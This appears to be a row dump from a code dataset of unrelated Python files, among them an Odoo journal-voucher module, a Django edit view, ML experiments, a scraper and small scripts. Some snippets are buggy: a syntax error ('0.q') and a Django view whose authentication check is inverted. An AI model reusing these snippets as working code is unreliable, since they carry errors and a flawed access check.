index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
998,100 | 6c04350a6741a594e2c05972af8a5bc262792336 | # -*- coding: utf-8 -*-
# Copyright 2019 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from random import random
import pytest
from iconservice.inv.data.value import *
from tests import create_address
class TestValue:
def _modify_if_collection_type(self, value: Any):
if isinstance(value, list):
value.append("dump")
for val in value:
if isinstance(val, (list, dict)):
self._modify_if_collection_type(val)
elif isinstance(value, dict):
value["dump_key"] = "dump_value"
for val in value.values():
if isinstance(val, (list, dict)):
self._modify_if_collection_type(val)
@pytest.mark.parametrize("icon_network_value, value", [
(RevisionCode(5), 5),
(RevisionName("1.1.5"), "1.1.5"),
(ScoreBlackList([]), []),
(StepPrice(10_000), 10_000),
(StepCosts({StepType('default'): 10_000}), {StepType('default'): 10_000}),
(MaxStepLimits({
IconScoreContextType.INVOKE: 100_000_000,
IconScoreContextType.QUERY: 100_000_000
}), {
IconScoreContextType.INVOKE: 100_000_000,
IconScoreContextType.QUERY: 100_000_000
}),
(ServiceConfig(5), 5),
(ImportWhiteList({"iconservice": ['*'], "os": ["path"]}), {"iconservice": ['*'], "os": ["path"]})
])
def test_from_to_bytes(self, icon_network_value: 'Value', value):
# TEST: Check key is generated as expected
expected_bytes_key = b'inv' + icon_network_value.TYPE.value
bytes_key: bytes = icon_network_value.make_key()
assert bytes_key == expected_bytes_key
# TEST: encoded_value should include the version information and encoded by msgpack
encoded_value: bytes = icon_network_value.to_bytes()
unpacked_value: list = MsgPackForDB.loads(encoded_value)
expected_version = 0
assert len(unpacked_value) == 2
assert unpacked_value[0] == expected_version
# TEST: decoded value has same value with original
decoded_value: 'Value' = icon_network_value.from_bytes(encoded_value)
assert decoded_value.value == icon_network_value.value
# TEST: returned value property should not effect on Value instances' value when being modified
returned_value: Any = icon_network_value.value
# Act
self._modify_if_collection_type(returned_value)
assert value == icon_network_value.value
# Below tests each Value's initialization
@pytest.mark.parametrize("value", [
{
type_: random() for type_ in StepType
},
{
StepType('delete'): -150
},
{
StepType('contractDestruct'): -100,
}
])
def test_step_costs_initialization(self, value):
step_costs: 'StepCosts' = StepCosts(value)
assert step_costs.value == value
@pytest.mark.parametrize("value", [{type_: -1} for type_ in StepType if
type_ != StepType.CONTRACT_DESTRUCT and type_ != StepType.DELETE])
def test_step_costs_should_raise_exception_when_setting_minus_costs(self, value):
with pytest.raises(InvalidParamsException) as e:
_: 'StepCosts' = StepCosts(value)
assert e.value.message.startswith("Invalid step costs:")
@pytest.mark.parametrize("value", [["list"], "str", 1, True, ("1", "2"), 0.1, b'bytes'])
def test_step_costs_should_raise_exception_when_input_invalid_type_value(self, value):
with pytest.raises(TypeError) as e:
_: 'StepCosts' = StepCosts(value)
assert e.value.args[0].startswith("Invalid Step costs type:")
@pytest.mark.parametrize("value", [{"dict": 1}, ["list"], "str", ("1", "2"), 0.1, -1, b'bytes'])
def test_step_price_should_raise_exception_when_input_invalid_value(self, value):
with pytest.raises(BaseException):
_: 'StepPrice' = StepPrice(value)
@pytest.mark.parametrize("value", [
{IconScoreContextType.INVOKE: -1, IconScoreContextType.QUERY: 0},
{IconScoreContextType.INVOKE: 0, IconScoreContextType.QUERY: -1},
["list"], "str", True, ("1", "2"), 0.1, -1, b'bytes'
])
def test_max_step_limits_should_raise_exception_when_input_invalid_value(self, value):
with pytest.raises(BaseException):
_: 'MaxStepLimits' = MaxStepLimits(value)
@pytest.mark.parametrize("value, expected_invoke, expected_query", [
({}, 0, 0),
({IconScoreContextType.INVOKE: 1}, 1, 0),
({IconScoreContextType.QUERY: 1}, 0, 1)
])
def test_max_step_limits_should_supplement_value(self, value, expected_invoke, expected_query):
max_step_limits: 'MaxStepLimits' = MaxStepLimits(value)
assert max_step_limits.value[IconScoreContextType.INVOKE] == expected_invoke
assert max_step_limits.value[IconScoreContextType.QUERY] == expected_query
@pytest.mark.parametrize("value", [
[1],
[b'bytes'],
["str"],
[create_address(), "str"],
{"dict": "value"}, "str", True, ("1", "2"), 0.1, -1, b'bytes'
])
def test_score_black_list_should_raise_exception_when_input_invalid_value(self, value):
with pytest.raises(BaseException):
_: 'ScoreBlackList' = ScoreBlackList(value)
@pytest.mark.parametrize("value", [
{1: ["path"]},
{b'bytes': ["path"]},
{"key": [1]},
{"key": {"dict": "value"}},
{"key": ("1", "2")},
{"key": ("1", "2")},
{"dict": "value"},
{"dict": 1},
{"dict": b'bytes'},
{"dict": True},
"str", True, ("1", "2"), 0.1, -1, b'bytes'
])
def test_import_white_list_should_raise_exception_when_input_invalid_value(self, value):
with pytest.raises(BaseException):
_: 'ImportWhiteList' = ImportWhiteList(value)
@pytest.mark.parametrize("value", [
-1,
sum(IconServiceFlag) + 1,
{"dict": True}, "str", ("1", "2"), b'bytes'
])
def test_service_config_should_raise_exception_when_input_invalid_value(self, value):
with pytest.raises(BaseException):
_: 'ServiceConfig' = ServiceConfig(value)
|
998,101 | 348fcd3f0350f21fd10f946e1b0d7136e42e4b48 | from scrapy import Spider
from scrapy.selector import Selector
from get_weather.items import GetWeatherItem
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class CrawlerSpider(Spider):
name = "crawler"
allowed_domains = [
"www.wunderground.com"]
# # start_urls = [
# # "https://www.wunderground.com/history/daily/vn/qu%E1%BA%ADn-t%C3%A2n-b%C3%ACnh/VVTS/date/2020-10-%d" ,
# # ]
# start_urls = url
def __init__(self, url, *args, **kwargs):
self.driver = webdriver.Firefox()
super(CrawlerSpider, self).__init__(*args, **kwargs)
self.start_urls = [f'{url}']
def parse(self, response):
self.driver.implicitly_wait(60)
self.driver.get(response.url)
self.driver.find_elements(
By.XPATH, '//table[@class="mat-table cdk-table mat-sort ng-star-inserted"]')
html = self.driver.page_source
body = Selector(text=html)
table = body.xpath(
'//*[@class="observation-table ng-star-inserted"]/table[@class="mat-table cdk-table mat-sort ng-star-inserted"]/tbody/tr')
for row in table:
item = GetWeatherItem()
# Pre-check
Time = row.xpath('td/span/text()')[0].extract()
Temperature = row.xpath(
'td/lib-display-unit/span/span/text()')[0].extract()
Dew_Point = row.xpath(
'td/lib-display-unit/span/span/text()')[1].extract()
Humidity = row.xpath(
'td/lib-display-unit/span/span/text()')[2].extract()
check = row.xpath('td/span/text()').extract()
if (len(check) == 2):
Wind = ""
Condition = row.xpath('td/span/text()')[1].extract()
else:
Wind = row.xpath('td/span/text()')[1].extract()
Condition = row.xpath('td/span/text()')[2].extract()
Wind_Speed = row.xpath(
'td/lib-display-unit/span/span/text()')[3].extract()
Wind_Gust = row.xpath(
'td/lib-display-unit/span/span/text()')[4].extract()
Pressure = row.xpath(
'td/lib-display-unit/span/span/text()')[5].extract()
Precip = row.xpath(
'td/lib-display-unit/span/span/text()')[6].extract()
if (Time == ''):
Time = "NoData"
if (Temperature == ''):
Temperature = "NoData"
if (Dew_Point == ''):
Dew_Point = "NoData"
if (Humidity == ''):
Humidity = "NoData"
if (Wind == ''):
Wind = "NoData"
if (Wind_Speed == ''):
Wind_Speed = "NoData"
if (Wind_Gust == ''):
Wind_Gust = "NoData"
if (Pressure == ''):
Pressure = "NoData"
if (Precip == ''):
Precip = "NoData"
if (Condition == ''):
Condition = "NoData"
item['Time'] = Time
item['Temperature'] = Temperature
item['Dew_Point'] = Dew_Point
item['Humidity'] = Humidity
item['Wind'] = Wind
item['Wind_Speed'] = Wind_Speed
item['Wind_Gust'] = Wind_Gust
item['Pressure'] = Pressure
item['Precip'] = Precip
item['Condition'] = Condition
yield item
self.driver.close()
|
998,102 | dfe95e5ecb3d46313d55d7bfa9092e563ea1e020 | from compute_ghcm_mdt_one_user import compute_ghcm_mdt_one_user as cgou
cgou(4) |
998,103 | d02154b27da930bcdac29cf5b093577ccd1c3b53 | from HMM_helper import *
from HMM import *
from makeRhymeDic import getRhymeDicShakes
import random
import numpy as np
# Parse the text file
f = open('data/shakespeare.txt')
obs, obs_map = parse_observations(f.read())
f.close()
X = obs
# Parse the A and O matrices
A = np.loadtxt('HMM_A.txt')
O = np.loadtxt('HMM_O.txt')
# Create the model
HMM = HiddenMarkovModel(A, O)
# Generate the sonnet
couplets = []
for i in range(7):
couplets.append(sample_shakes_couplet(HMM, obs_map, 10))
f = open("generated_poems/shakespeare_sonnet.txt", "w")
for i in range(3):
f.write(couplets[2 * i][0] )
f.write(couplets[2 * i + 1][0] )
f.write(couplets[2 * i][1] )
f.write(couplets[2 * i + 1][1] )
f.write(couplets[6][0] )
f.write(couplets[6][1] )
f.close()
visualize_sparsities(HMM)
states_to_wordclouds(HMM, obs_map)
|
998,104 | 09e92db174c24f1bcb49b24af31470604cc389da | import heapq
from options import Options
from tile import Tile
from drop import Drop
class AStar:
NSEW = -Options.tiles_x, Options.tiles_x, 1, -1 # Add to find tile in a direction
def __init__(self, zombie, survivor):
for tile in Tile.opens: # Reset from last search
tile.parent = None
tile.h, tile.f, tile.g = 0, 0, 0
zombie.path = []
self.open = []
heapq.heapify(self.open)
self.closed = set()
self.zombie = zombie
self.start = zombie.get_tile()
self.end = survivor.get_tile()
if "trans" in Drop.actives:
self.end = self.end.closest_open_tile()
if self.end is self.start:
self.solve = lambda *_: None # overwrite solve and make the zombie stay
heapq.heappush(self.open, (self.start.f, self.start))
def get_neighbours(self, cell):
for cardinal, offset in enumerate(AStar.NSEW):
sur_tile_num = cell.number + offset
try:
sur_tile = Tile.instances[sur_tile_num]
except IndexError:
continue
if (sur_tile.walkable and sur_tile not in self.closed and
Tile.on_screen(cardinal, sur_tile_num)):
yield sur_tile
def get_heuristic(self, cell):
""":return the Manhattan distance between end and cell
https://en.wikipedia.org/wiki/Taxicab_geometry"""
return 10 * (self.end.pos - cell.pos).manhattan_dist() / Tile.length
def update_cell(self, neighbour, cell):
neighbour.g = cell.g + 10
neighbour.h = self.get_heuristic(neighbour)
neighbour.f = neighbour.h + neighbour.g
neighbour.parent = cell
def solve(self):
while self.open and self.end not in self.closed:
f, cell = heapq.heappop(self.open)
assert cell.walkable
self.closed.add(cell)
neighbours = self.get_neighbours(cell)
for neighbour in neighbours:
if (neighbour.f, neighbour) in self.open:
if neighbour.g > cell.g + 10:
self.update_cell(neighbour, cell)
else:
self.update_cell(neighbour, cell)
heapq.heappush(self.open, (neighbour.f, neighbour))
parent = self.end
while not (parent is None or parent is self.start):
child = parent
parent = parent.parent
self.zombie.path.append(child)
self.zombie.set_target(child)
if __name__ == "__main__":
import doctest
doctest.testmod()
|
998,105 | 4db2157789ca6feab0754681966c1433aedf8193 | import FWCore.ParameterSet.Config as cms
process = cms.Process("MyAnal")
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("RecoJets.Configuration.CaloTowersES_cfi")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source("PoolSource",
# replace 'myfile.root' with the source file you want to useru
fileNames = cms.untracked.vstring(
#'/store/data/Commissioning08/Cosmics/RECO/CRAFT_ALL_V9_225-v2/0002/CA3CF466-E7F9-DD11-AF70-003048679006.root'
#'/store/data/Commissioning08/Cosmics/RAW-RECO/CRAFT_ALL_V9_TrackingPointing_225-v3/0006/E45FEB6E-A0FF-DD11-B5ED-00304867C0FC.root'
'/store/data/Commissioning08/Cosmics/RECO/CRAFT_ALL_V9_225-v2/0002/1AC595AF-BFFA-DD11-A899-0030486792B6.root'
)
)
process.TFileService = cms.Service("TFileService",
closeFileFast = cms.untracked.bool(True),
fileName = cms.string('hcalanal-jettrig.root')
)
process.load("MyEDmodules.HcalTimingAnalyzer.hcalFilteredReco4CRAFT_cff")
#-----------------------------
# Hcal Conditions: from Global Conditions Tag
#-----------------------------
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.connect = 'frontier://Frontier/CMS_COND_21X_GLOBALTAG'
process.GlobalTag.globaltag = 'CRAFT_V4P::All' # or any other appropriate
process.prefer("GlobalTag")
# L1 GT EventSetup
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.startup.L1Menu_startup2_v2_Unprescaled_cff")
process.load("L1Trigger.Skimmer.l1Filter_cfi")
#process.l1Filter.algorithms = cms.vstring("L1_SingleMuOpen")
#process.l1Filter.algorithms = cms.vstring("L1_SingleEG5_00001")
process.l1Filter.algorithms = cms.vstring("L1_SingleJet10_0001")
#process.p = cms.Path(process.l1Filter*process.hcalDigis*process.myan)
process.p = cms.Path(process.l1Filter*process.allfilts)
process.out = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('p')
),
outputCommands = cms.untracked.vstring(
"drop *",
"keep *_*_*_MyAnal",
"keep recoCaloMETs_*_*_*",
"keep *_hbhereco_*_*",
"keep *_hfreco_*_*",
"keep *_horeco_*_*",
"keep *_towerMaker_*_*"
),
fileName = cms.untracked.string('hcaltimeanal-jettrig-pool.root')
)
process.o = cms.EndPath(process.out)
|
998,106 | 483807fc64e55f4a625bf21922aed528b2747954 | # This example sets a weight of 1.0 for all clones of the active Cloner object
import c4d
from c4d.modules import mograph
def main():
# Aborts if no active object or if it is not a Cloner
if op is None or op.GetType() != 1018544:
return
# Builds list for clones weights values
weights = [1.0]*op[c4d.MG_LINEAR_COUNT]
# Sets clones weights values
mograph.GeSetMoDataWeights(op, weights)
c4d.EventAdd()
if __name__=='__main__':
main()
|
998,107 | 07acf84f656095b9926e4d276f99d5b480c8b50a | from pyo import *
import math
import time
import os
import glob
import load
s=Server(sr=44100,duplex=0).boot()
name = "nessaAllTrim.wav"
path = "../samples"
name="BD TI.wav"
infile = os.path.join(path, name)
print "current file is: " + infile
table = SndTable(path=infile)
dur = table.getDur()
trig=Trig().stop()
osc=TrigEnv(trig,table, dur, interp=2, mul=1 ).out()
stress=load.StressMonitor()
metro=Metro(1).play()
def doit():
print stress.doit()
trigFunc=TrigFunc(metro,doit)
s.gui(locals())
|
998,108 | 9c5e3939732ede0863d130bd48960fe3ccb350c0 | from enum import Enum
from typing import List, Optional
from pydantic import BaseModel, Field, PositiveInt, validator
class MaritalStatus(str, Enum):
single = "single"
married = "married"
class OwnershipStatus(str, Enum):
mortgaged = "mortgaged"
owned = "owned"
class House(BaseModel):
ownership_status: OwnershipStatus
class Vehicle(BaseModel):
year: PositiveInt
class UserProfile(BaseModel):
age: int = Field(ge=0)
dependents: int = Field(ge=0)
income: int = Field(ge=0)
marital_status: MaritalStatus
risk_questions: List
house: Optional[House]
vehicle: Optional[Vehicle]
class Config:
allow_mutation = False
@validator("risk_questions")
def questions_must_be_zero_or_one(cls, answers: List) -> List:
if len(answers) != 3:
raise ValueError("risk answers length should be 3")
for ans in answers:
if ans not in [0, 1]:
raise ValueError("risk answers must be 0 or 1")
return answers
|
998,109 | 87c5deec30c62992f15680911f37f76d6d7fc026 | import numpy as np
import pandas as pd
from gradientDescend_oops import lm,logit
import matplotlib.pyplot as plt
import seaborn as sns
import statsmodels.api as sm
import statsmodels.discrete.discrete_model as smd
#from gradientDescend import logit
###################### reading data #######################################
df=pd.read_csv(r".\energydata_complete.csv")
df.date=pd.to_datetime(df.date)
y=df["Appliances"]
x=df[['T1','T2','T3','T4','T5','T6']]
np.random.seed(100)
split = np.random.uniform(size=x.shape[0]) < 0.7
X_train= x[split]
y_train= y[split]
X_test= x[~split]
y_test= y[~split]
x_train_mean = X_train.mean(axis=0)
x_train_std = X_train.std(axis=0)
X_train_norm = (X_train-x_train_mean)/x_train_std
X_test_norm = (X_test-x_train_mean)/x_train_std
y_train_class = np.where(y_train>np.median(y_train),1,0)
y_test_class = np.where(y_test>np.median(y_train),1,0)
train_hist = []
test_hist = []
cost_iter_hist = []
alphas = 10**(np.arange(-5,0,0.5))
for alpha in alphas:
model = lm(verbose=False, maxiter=100000, alpha =alpha, restart=1, tol= 1e-8)
finalb, finalW, cost_hist = model.fit(X_train_norm, np.log(y_train))
(_,train_cost),(_,test_cost) = model.predict(X_test_norm,np.log(y_test))
cost_iter_hist += [cost_hist]
train_hist += [train_cost]
test_hist += [test_cost]
plt.plot(np.log10(alphas), train_hist)
plt.plot(np.log10(alphas), test_hist)
for i in cost_iter_hist:
plt.plot(len(i))
train_hist = []
test_hist = []
tols = 10**(np.arange(-12,2,0.5))#[1e-12,1e-11,1e-10,1e-9,1e-8,1e-7,1e-6,1e-5,1e-4,1e-3,1e-2,1e-1,1,10,100]
for tol in tols:
model = lm(verbose=False, maxiter=100000, alpha =0.001, restart=1, tol= tol)
finalb, finalW, cost_hist = model.fit(X_train_norm, np.log(y_train))
(_,train_cost),(_,test_cost) = model.predict(X_test_norm,np.log(y_test))
train_hist += [train_cost]
test_hist += [test_cost]
plt.plot(np.log10(tols), train_hist)
plt.plot(np.log10(tols), test_hist)
model = logit(verbose=False, maxiter=100000, alpha =0.q, restart=1, tol= 1e-8)
finalb, finalW, cost_hist = model.fit(X_train_norm, y_train_class)
model.predict(X_test_norm,y_test_class)
cost_hist[-1]
a=[]
c=[]
for alpha in np.log10(np.logspace(10,1,10)):
beta, mincost = lm(X=x_norm, Y=y, verbose=False, maxiter=10000, alpha =alpha, restart=1)
a+=[alpha]
c+=[mincost]
print('{0:0.2f} --> {1:0.2f}'.format(alpha, mincost))
plt.plot(cost_hist)
plt.plot(a, c, 'o')
##################### Comparing with Statmodel #############################
df.describe()
import statsmodels.api as sm
import statsmodels.discrete.discrete_model as smd
mod = sm.OLS(np.log(y_train), X_train_norm)
res = mod.fit()
res.summary()
mod1=smd.Logit(y_train_class, X_train_norm).fit()
mod1.summary()
import seaborn as sns
sns.distplot(np.log(y))
|
998,110 | 0351908ef3dc33f70df8fc4fc33c9a1d9e5df8d1 |
from django.shortcuts import render, get_object_or_404
from restful import restful
from ..models import Cat
from ..forms import CatModelForm
from django.http import HttpResponseRedirect
from django.urls import reverse
import sys
@restful
def edit(request, cat):
if request.method == 'POST':
raw_data = dict()
raw_data.update( request.POST )
tovar = get_object_or_404(Cat, pk=id_cat)
form = CatModelForm(instance=cat)
return render(request, 'cat/cat_edit.html', locals())
@edit.method('POST')
def edit(request, id_cat):
if request.user.is_authenticated:
return HttpResponseRedirect(reverse('cat:index'))
if not request.user.user.is_superuser:
if not request.user.has_perm('cat.change_cat'):
return HttpResponseRedirect(reverse('cat:index'))
raw_data = dict()
raw_data.update( request.POST )
cat = get_object_or_404(Cat, pk=id_cat)
form = CatModelForm(request.POST, instance=cat)
if form.is_valid():
form.save()
return render(request, 'cat/cat_edit.html', locals())
else:
return render(request, 'cat/cat_edit.html', locals())
|
998,111 | 51b279f08c59f7e055cca2cef4308bdf3d76594a | """
===== LIGHT SEQUENCE RUNNER v.1.0b =====
Copyright (C) 2019 - 2020 IU7Games Team.
Запуск стратегии 7EQUEENCEGAME игрока, для проверки на отсутствие segmentation fault,
бесконечных циклов и так далее.
"""
import os
from games.sequence.sequence_runner import start_sequence_game
def light_sequence_runner(player_lib_path):
"""
Запуск стратегии игрока на тестовых значениях.
"""
start_sequence_game([player_lib_path])
print("\033[0;32mSEQUENCE GAME: OKAY\033[0m")
if __name__ == "__main__":
light_sequence_runner(
f"/sandbox/{os.environ['GITLAB_USER_LOGIN']}_7equeence_lib.so")
|
998,112 | 0a313d58805d64820850beadce26c07972e4579e | from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools import amount_to_text_en, float_round
import odoo.addons.decimal_precision as dp
#==================================================
# Class : BiJournalVoucher
# Description : Account Receipt Details
#==================================================
class BiJournalVoucher(models.Model):
_name = "bi.journal.voucher"
_description = "Journal Voucher Details"
@api.multi
def _get_default_journal(self):
return self.env['account.journal'].search([('type', '=', 'general')], limit=1).id
name = fields.Char(string="Sequence No", required=True, Index= True, default=lambda self:('New'), readonly=True, states={'draft': [('readonly',False)]})
receipt_date = fields.Date(string="Voucher Date", default=fields.Date.context_today, required=True, readonly=True, states={'draft': [('readonly',False)]})
customer = fields.Many2one('res.partner', string = "Customer", readonly=True, states={'draft': [('readonly',False)]})
journal_id = fields.Many2one('account.journal',string="Journal ID", required=True, readonly=True, states={'draft': [('readonly',False)]}, default=_get_default_journal, domain=[('type', '=', 'general')])
account_id = fields.Many2one('account.account',string="Account ID", readonly=True, states={'draft': [('readonly',False)]})
narration = fields.Text(string="Narration")
receipt_ids = fields.One2many('bi.journal.voucher.line','receipt_id',string="Accounts",readonly=True, states={'draft': [('readonly', False)]})
user_id = fields.Many2one('res.users',string='Username',default=lambda self: self.env.user)
move_id = fields.Many2one('account.move', string='Journal Entry',readonly=True, index=True, ondelete='restrict', copy=False,
help = "Link to the automatically generated Journal Items.")
state = fields.Selection([
('draft', 'Draft'),
('post', 'Posted'),
('cancel', 'Cancelled'),
], string='Status', readonly=True, copy=False, index=True, track_visibility='onchange', default='draft')
company_id = fields.Many2one('res.company', 'Company', default=lambda self: self.env['res.company']._company_default_get('sale.order'), states={'post': [('readonly',True)]})
currency_id = fields.Many2one('res.currency', string='Currency',default=lambda self: self.env.user.company_id.currency_id,readonly=True, states={'draft': [('readonly', False)]})
bank_type = fields.Selection([('cheque','Cheque'),('ntfs','NTFS'),('cash','Cash'),('others','Others')],string="Payment Type",readonly=True, states={'draft': [('readonly', False)]})
cheque_no = fields.Char("Cheque Number")
Cheque_date = fields.Date("Cheque Date")
vendor_invoice = fields.Char(string="Vendor Invoice" , store=True)
school_id = fields.Many2one('school.school', 'Campus')
_sql_constraints = [
('vendor_invoice', 'unique( vendor_invoice )', 'Vendor Invoice must be unique.') ]
@api.multi
def button_post(self):
aml_dict = {}
total=0.0
aml_obj = self.env['account.move.line'].with_context(check_move_validity=False)
for receipt in self:
dst_move = self.env['account.move'].create({
'date': receipt.receipt_date,
'ref':('Receipt'+' - '+str(receipt.vendor_invoice)),
'company_id': receipt.company_id.id,
'journal_id':receipt.journal_id.id,
'school_id':receipt.school_id.id,
})
company_currency = receipt.company_id.currency_id
for line in receipt.receipt_ids:
if line.credit_amount>0:
debit, credit, amount_currency, currency_id = aml_obj.with_context(date=self.receipt_date).compute_amount_fields(line.credit_amount, self.currency_id, self.company_id.currency_id, company_currency)
i=1
aml_dict={
'name':(receipt.cheque_no and '-'+str(receipt.cheque_no) or '')+'-'+(line.name and str(line.name) or ''),
'account_id': line.account_id.id,
'currency_id': receipt.currency_id.id,
'currency_id': currency_id and currency_id or False,
'journal_id': receipt.journal_id.id,
'debit':0.0,
'analytic_account_id':line.analytic_account_id and line.analytic_account_id.id or False,
'credit':debit,
'partner_id':line.partner_id.id,
'move_id':dst_move.id,
'amount_currency': amount_currency and amount_currency*-1 or 0.0,
}
aml_obj.create(aml_dict)
if line.debit_amount>0:
debit, credit, amount_currency, currency_id = aml_obj.with_context(date=self.receipt_date).compute_amount_fields(line.debit_amount, self.currency_id, self.company_id.currency_id, company_currency)
aml_dict.update({
'name': (receipt.cheque_no and '-'+str(receipt.cheque_no) or '')+'-'+(line.name and str(line.name) or ''),
'account_id': line.account_id.id,
'currency_id': currency_id and currency_id or False,
'journal_id': receipt.journal_id.id,
'credit':0.0,
'debit':debit,
'analytic_account_id':False,
'partner_id':line.partner_id.id,
'move_id':dst_move.id,
'amount_currency': amount_currency and amount_currency or 0.0,
})
aml_obj.create(aml_dict)
dst_move.post()
receipt.write({'state':'post','move_id':dst_move.id,'name':dst_move.name})
@api.multi
def button_cancel(self):
if self.move_id:
self.move_id.button_cancel()
move_id = self.move_id
self.write({'state': 'cancel','move_id' : False})
move_id.unlink()
@api.multi
def button_draft(self):
self.write({'state': 'draft'})
@api.multi
def unlink(self):
for order in self:
if order.state not in ('draft'):
raise UserError(_('You can not delete receipt voucher'))
return super(BiJournalVoucher, self).unlink()
@api.multi
def get_check_amount_in_words(self, amount):
# TODO: merge, refactor and complete the amount_to_text and amount_to_text_en classes
check_amount_in_words = amount_to_text_en.amount_to_text(amount, lang='en', currency='')
check_amount_in_words = check_amount_in_words.replace('Cents', ' Only') # Ugh
check_amount_in_words = check_amount_in_words.replace('Cent', ' Only')
decimals = amount % 1
return check_amount_in_words
@api.onchange('account_id')
def OnchangeAccount(self):
for x in self:
x.tax_id = self.account_id.tax_ids
#==================================================
# Class : BiAccountReceiptLine
# Description : Account Receipt Line
#==================================================
class BiAccountVoucherLine(models.Model):
_name = "bi.journal.voucher.line"
_description = "Journal Voucher Line"
receipt_id = fields.Many2one('bi.journal.voucher',string="Receipt")
tax_id = fields.Many2many('account.tax', string='Taxes', domain=['|', ('active', '=', False), ('active', '=', True)])
account_id = fields.Many2one('account.account', domain=[] , string="Account ID", required=True)
analytic_account_id = fields.Many2one('account.analytic.account',"Analytic Account")
name = fields.Char(string="Description", required=True)
credit_amount = fields.Float(string="Credit Amount", required=False)
debit_amount = fields.Float(string="Debit Amount", required=False)
currency_id = fields.Many2one('res.currency', related='receipt_id.currency_id', store=True, related_sudo=False)
partner_id = fields.Many2one('res.partner', string = "Partner Account")
sql_constraints = [
('credit_debit1', 'CHECK (credit_amount*debit_amount=0)', 'Wrong credit or debit value in accounting entry !'),
('credit_debit2', 'CHECK (credit_amount+debit_amount>=0)', 'Wrong credit or debit value in accounting entry !'),
]
@api.onchange('partner_id')
def _onchange_partner_id(self):
if self.partner_id:
if self.partner_id.customer == True:
self.account_id = self.partner_id.property_account_receivable_id.id
if self.partner_id.supplier ==True:
self.account_id = self.partner_id.property_account_payable_id.id
|
998,113 | 12b9cd5ad1a2e0b29ecf1b7df4b2bc8ef09641e0 | # -*- coding: utf-8 -*-
"""
Code Challenge
Name:
Titanic Analysis
Filename:
titanic.py
Dataset:
training_titanic.csv
Problem Statement:
It’s a real-world data containing the details of titanic ships
passengers list.
Import the training set "training_titanic.csv"
Answer the Following:
How many people in the given training set survived the disaster ?
How many people in the given training set died ?
Calculate and print the survival rates as proportions (percentage)
by setting the normalize argument to True.
Males that survived vs males that passed away
Females that survived vs Females that passed away
Does age play a role?
since it's probable that children were saved first.
Another variable that could influence survival is age;
since it's probable that children were saved first.
You can test this by creating a new column with a categorical variable Child.
Child will take the value 1 in cases where age is less than 18,
and a value of 0 in cases where age is greater than or equal to 18.
Then assign the value 0 to observations where the passenger
is greater than or equal to 18 years in the new Child column.
Compare the normalized survival rates for those who are <18 and
those who are older.
To add this new variable you need to do two things
1. create a new column, and
2. Provide the values for each observation (i.e., row) based on the age of the passenger.
Hint:
To calculate this, you can use the value_counts() method in
combination with standard bracket notation to select a single column of
a DataFrame
"""
# Importing pandas module as pd
import pandas as pd
try:
# Reading training_titanic.csv file and storing it in a variable namded titanic_df
titanic_df = pd.read_csv("training_titanic.csv")
except FileNotFoundError as e:
print(e)
else:
# Fetching the count of survived and death peoples
# 1 represent alive and 0 death
survival_counts = titanic_df['Survived'].value_counts()
# Fetching the frequency of the survival records
# normalize setto True to get the frequency
survival_frequency = titanic_df['Survived'].value_counts(normalize=True)
# To count the total survived humans, total male counts
# survived = titanic_df["Survived"].value_counts()[1]
# male_counts = titanic_df["Sex"].value_counts()["male"]
# Men's survival counts
Men_survival_counts = (titanic_df['Survived'])[titanic_df['Sex']=='male'].value_counts()
# Men's survival frequency
Men_survival_frequency = (titanic_df['Survived'])[titanic_df['Sex']=='male'].value_counts(normalize=True)
# Female survival counts
Female_survival_counts = (titanic_df['Survived'])[titanic_df['Sex']=='female'].value_counts()
# Female survival frequency
Female_survival_frequency = (titanic_df['Survived'])[titanic_df['Sex']=='female'].value_counts(normalize=True)
# Adding the column Child with values 0 in the existing dataframe stored in titanic_df
titanic_df['Child'] = 0
# Filling the empty numerical columns
titanic_df = titanic_df.fillna(titanic_df.mean())
# Filling child column with 1 where age is greater than 18
titanic_df['Child'][titanic_df['Age'] > 18] = 1
"""
# To create a dataframe where we have to fill 1 for age less than 18 and 0 for more than 18
a = titanic_df.loc[:, ['Age']]
a['Child'] = 'mising'
# A function to be passed in apply method for performing the above operation
def filter_data(value):
if 0 <= value <= 18:
return 1
else:
return 0
a['Child'] = a['Age'].apply(filter_data)
""" |
998,114 | 22bf197cf19246f3959ee8445732165990cd9c3a | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#from test0 import test
from exams import quiz
import sys
# Let's load the csv with the data
csv = open('pinyin.csv', 'r', encoding='utf-8').read().split("\n")
language = 2 # default: english
if len(sys.argv) > 1: # some parameters introduced!
if sys.argv[1] == "--spanish": language = 3
elif sys.argv[1] == "--russian": language = 4
# Build an array made of dictionaries
dict_array = []
for line in csv:
dict_array.append({
"chinese":line.split(";")[0],
"pinyin":line.split(";")[1],
"translation":line.split(";")[language]#, # list()
#"sentences":[], # list()
#"tag":""
})
#test(dict_array) # uncomment for test porpouses
quiz(dict_array, language)
|
998,115 | 7bc909213c53c94b277d182f8db205ad08b8a236 | from core.effect.base import EffectBase
from core.helper import chance
from core.tuning.skill import SkillTuning
from raisecap.tuning.effect import EffectTuning
from siege import game, Locale
class Precision(EffectBase):
TUNING = EffectTuning.PRECISION
@property
def description(self):
return Locale.getEscaped(Precision.TUNING.DESC).format(chance=Locale.getEscaped(self.chance))
def __init__(self, owner, level, duration, source, isRefresh):
super(Precision, self).__init__(owner, duration, isRefresh)
self.chance = SkillTuning.PRECISION.CHANCES[level - 1]
if owner.isPlayer():
owner.event['tool_power'].listen(self.handleToolPower)
